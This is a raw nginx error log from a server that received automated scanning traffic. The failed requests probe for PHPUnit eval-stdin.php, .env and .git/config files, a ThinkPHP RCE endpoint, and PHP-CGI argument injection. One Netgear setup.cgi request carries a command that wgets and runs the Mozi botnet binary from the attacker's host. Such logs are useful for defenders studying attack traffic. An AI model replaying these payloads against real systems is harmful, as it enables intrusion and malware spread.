2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:55 [error] 943#943: *95252 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:55 [error] 943#943: *95252 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:56 [error] 943#943: *95252 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:57:48 [error] 951#951: *95258 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51"
2026/02/18 05:57:49 [error] 952#952: *95259 open() "/var/www/html/admin/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /admin/.git/config HTTP/1.1", host: "222.117.41.51"
2026/02/18 05:57:49 [error] 950#950: *95260 open() "/var/www/html/private/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /private/.git/config HTTP/1.1", host: "222.117.41.51"
2026/02/18 06:20:02 [error] 951#951: *95293 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 06:28:32 [error] 951#951: *95317 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 74.82.47.2, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "222.117.41.51"
2026/02/18 06:34:34 [error] 955#955: *96808 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 74.82.47.2, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "222.117.41.51"
2026/02/18 07:03:07 [error] 956#956: *96824 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 07:03:08 [error] 956#956: *96826 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:03:00 [error] 951#951: *96943 open() "/var/www/html/setup.cgi" failed (2: No such file or directory), client: 182.60.237.31, server: localhost-nginx-proxy-manager, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://182.60.237.31:42440/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0"
2026/02/18 08:44:28 [error] 952#952: *96961 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:32 [error] 952#952: *96961 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:32 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:38 [error] 952#952: *96961 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:38 [error] 952#952: *96961 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:41 [error] 952#952: *96961 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:41 [error] 952#952: *96961 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 08:44:42 [error] 952#952: *96961 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 09:57:02 [error] 952#952: *96987 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.82, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51"
2026/02/18 10:34:11 [error] 950#950: *96995 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 10:57:12 [error] 950#950: *97010 open() "/var/www/html/manager/html" failed (2: No such file or directory), client: 20.65.195.124, server: localhost-nginx-proxy-manager, request: "GET /manager/html HTTP/1.1", host: "222.117.41.51"
2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
